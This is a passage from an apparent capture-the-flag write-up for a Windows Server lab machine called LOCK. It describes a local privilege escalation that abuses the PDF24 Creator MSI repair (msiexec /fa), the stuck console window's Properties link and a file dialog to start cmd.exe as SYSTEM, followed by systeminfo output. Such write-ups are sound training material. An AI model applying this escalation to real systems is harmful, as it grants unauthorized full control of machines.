msiexec.exe /fa C:\_install\pdf24-creator-11.15.1-x64.msi

This can take some time, but at the end we can see that there is indeed a cmd window stuck.

Step 3

From here we can right-click the stuck window and go to Properties. In Properties there is a blue highlighted clickable link which opens a web browser when clicked.

Step 4

In the very final step we just have to open a file dialog, which we can do with Ctrl+O. When the dialog opens we type cmd.exe into the search bar and hit Enter. This starts a new cmd.exe process running as SYSTEM.

 

.

Beyond root

c:\Users\Administrator\Desktop>systeminfo

Host Name:                 LOCK
OS Name:                   Microsoft Windows Server 2022 Standard
OS Version:                10.0.20348 N/A Build 20348
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00454-10000-00001-AA973
Original Install Date:     12/27/2023, 10:15:07 AM
System Boot Time:          6/2/2024, 7:32:53 AM
System Manufacturer:       Amazon EC2
System Model:              t3a.small
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2200 Mhz
BIOS Version:              Amazon EC2 1.0, 10/16/2017
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     1,996 MB
Available Physical Memory: 355 MB
Virtual Memory: Max Size:  3,148 MB
Virtual Memory: Available: 1,100 MB
Virtual Memory: In Use:    2,048 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB5031993
                           [02]: KB5033118
                           [03]: KB5032310
Network Card(s):           1 NIC(s) Installed.
                           [01]: Amazon Elastic Network Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.10.64.1
                                 IP address(es)
                                 [01]: 10.10.113.72
                                 [02]: fe80::b536:c258:f11a:5528
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

c:\Users\Administrator\Desktop>